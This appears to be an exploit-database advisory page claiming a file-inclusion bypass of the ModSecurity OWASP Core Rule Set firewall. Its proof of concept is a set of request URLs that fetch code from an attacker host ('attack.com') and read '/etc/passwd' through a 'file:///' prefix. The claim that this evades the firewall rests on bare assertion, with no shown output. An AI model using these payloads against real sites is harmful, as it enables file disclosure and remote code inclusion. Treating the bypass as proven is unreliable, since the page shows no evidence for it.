Modsecurity Owasp crs Firewall (WAF) - LFI/RFI hpp (bypass)

2019.01.21

Salvatrucha (DZ)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Exploit title : Modsecurity Owasp crs - LFI/RFI hpp (bypass)
Exploit author : Salvatrucha
software link : https://modsecurity.org/crs/
Tested on : Win7_64
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
>Installation :
CRS 3 requires an Apache/IIS/Nginx web server with ModSecurity 2.8.0 or higher
HTTPS : git clone https://github.com/SpiderLabs/owasp-modsecurity-crs.git
SSH : git clone git@github.com:SpiderLabs/owasp-modsecurity-crs.git
>proof of concept
target.com/search.php?q=http://attack.com/meliciouscode.txt
target.com/search.php?q=../../etc/passwd
##show forbidden message
target.com/search.php?q=file:///attack.com/meliciouscode.txt
target.com/search.php?q=file:///../../etc/passwd
##The request will be done

References:

Salvatrucha

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Modsecurity Owasp crs Firewall (WAF) - LFI/RFI hpp (bypass)

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.